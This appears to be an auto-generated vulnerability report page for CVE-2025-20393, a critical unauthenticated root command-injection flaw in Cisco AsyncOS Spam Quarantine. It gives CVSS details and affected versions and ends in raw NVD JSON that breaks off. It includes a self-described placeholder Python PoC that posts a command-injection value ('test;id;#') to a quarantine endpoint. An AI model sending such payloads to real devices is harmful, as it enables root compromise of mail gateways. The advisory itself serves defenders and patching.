Security Vulnerability Report
CVE-2025-20393 CVSS 10.0 CRITICAL

CVE-2025-20393

Published: 2025-12-17 17:15:49
Last Modified: 2026-01-16 14:00:13

Description

A vulnerability in the Spam Quarantine feature of Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager could allow an unauthenticated, remote attacker to execute arbitrary system commands on an affected device with root privileges. This vulnerability is due to insufficient validation of HTTP requests by the Spam Quarantine feature. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

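cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* (versions before 15.0.5-016) - VULNERABLE
cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* (versions 15.5 up to but excluding 15.5.4-012) - VULNERABLE
cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* (versions 16.0 up to but excluding 16.0.4-016) - VULNERABLE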
cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c100v:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c300v:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c600v:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:cisco:secure_email_gateway_c195:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:cisco:secure_email_gateway_c395:-:*:*:*:*:*:*:* - NOT VULNERABLE
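cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* (versions before 15.0.2-007) - VULNERABLE
cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* (versions 15.5 up to but excluding 15.5.4-007) - VULNERABLE
cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* (versions 16.0 up to but excluding 16.0.4-010) - VULNERABLE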
cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m100v:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m300v:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m600v:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:cisco:secure_email_and_web_manager_m170:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:cisco:secure_email_and_web_manager_m190:-:*:*:*:*:*:*:* - NOT VULNERABLE
Cisco AsyncOS for Secure Email Gateway (see the official advisory for specific versions)
Cisco AsyncOS for Secure Email and Web Manager (see the official advisory for specific versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-20393 PoC - Cisco AsyncOS Spam Quarantine RCE
Note: This is a conceptual PoC for educational and security testing purposes only.
Unauthorized access to systems is illegal.
"""
import requests
import urllib3

urllib3.disable_warnings()

TARGET = "https://<target-ip>/"


def check_vulnerability():
    """Check if target is vulnerable"""
    # Construct malicious request targeting Spam Quarantine
    # The actual exploit requires specific parameter manipulation
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # This is a placeholder - actual exploitation requires
    # understanding the specific vulnerable parameter
    payload = {
        'quarantine_id': 'test;id;#',
        'action': 'view'
    }

    try:
        response = requests.post(
            TARGET + 'quarantine/view',
            data=payload,
            headers=headers,
            verify=False,
            timeout=10
        )
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None


if __name__ == "__main__":
    print("[*] CVE-2025-20393 - Cisco AsyncOS Spam Quarantine RCE")
    print("[*] Use responsibly and only on systems you have permission to test")
    check_vulnerability()

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20393", "sourceIdentifier": "[email protected]", "published": "2025-12-17T17:15:48.523", "lastModified": "2026-01-16T14:00:12.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Spam Quarantine feature of Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager could allow an unauthenticated, remote attacker to execute arbitrary system commands on an affected device with root privileges.\r\n\r\nThis vulnerability is due to insufficient validation of HTTP requests by the Spam Quarantine feature. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with&nbsp;root privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "cisaExploitAdd": "2025-12-17", "cisaActionDue": "2025-12-24", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Cisco Multiple Products Improper Input Validation Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.5-016", "matchCriteriaId": "F7005EE5-0976-4E88-933F-C451D196C057"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.5", "versionEndExcluding": "15.5.4-012", "matchCriteriaId": "81772A3F-141D-4C3D-8094-1BD359D07C4A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0", "versionEndExcluding": "16.0.4-016", "matchCriteriaId": "32FF4E02-3750-4654-BD48-126133B33E6A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c100v:-:*:*:*:*:*:*:*", "matchCriteriaId": "5B6FBC8A-8187-4903-B786-6CF341C142B5"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c300v:-:*:*:*:*:*:*:*", "matchCriteriaId": "68864429-9730-43E9-96C3-20B9035BB291"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c600v:-:*:*:*:*:*:*:*", "matchCriteriaId": "B52D8B2B-E9AE-4B02-87BD-9CF9FA95906A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_gateway_c195:-:*:*:*:*:*:*:*", "matchCriteriaId": "7B1322B8-1CF9-4B17-9A58-38788051ED4F"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_gateway_c395:-:*:*:*:*:*:*:*", "matchCriteriaId": "139A640B-1957-4953-AA88-9D373A5152D1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_gateway_c695:-:*:*:*:*:*:*:*", "matchCriteriaId": "F08EA2AD-618B-4834-A52D-73F6A4502DF1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.2-007", "matchCriteriaId": "6893AE30-31DE-42CB-A463-E3DE22977107"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.5", "versionEndExcluding": "15.5.4-007", 
"matchCriteriaId": "12017942-B997-4FB1-B7FF-504EA72AC705"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0", "versionEndExcluding": "16.0.4-010", "matchCriteriaId": "F29F71EF-ED63-4DB2-A8BA-EB1E1A3BFF09"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m100v:-:*:*:*:*:*:*:*", "matchCriteriaId": "0C9613A5-B198-4AD2-BC74-F21ABAF79174"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m300v:-:*:*:*:*:*:*:*", "matchCriteriaId": "57831FD6-1CF3-4ABE-81BA-2576418F9083"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m600v:-:*:*:*:*:*:*:*", "matchCriteriaId": "67E804AE-4743-44AD-A364-504B0AB0D9BF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_and_web_manager_m170:-:*:*:*:*:*:*:*", "matchCriteriaId": "3057023B-AD68-4953-A780-75EA416A7B94"}, {"vulnerable": false, "cr ... (truncated)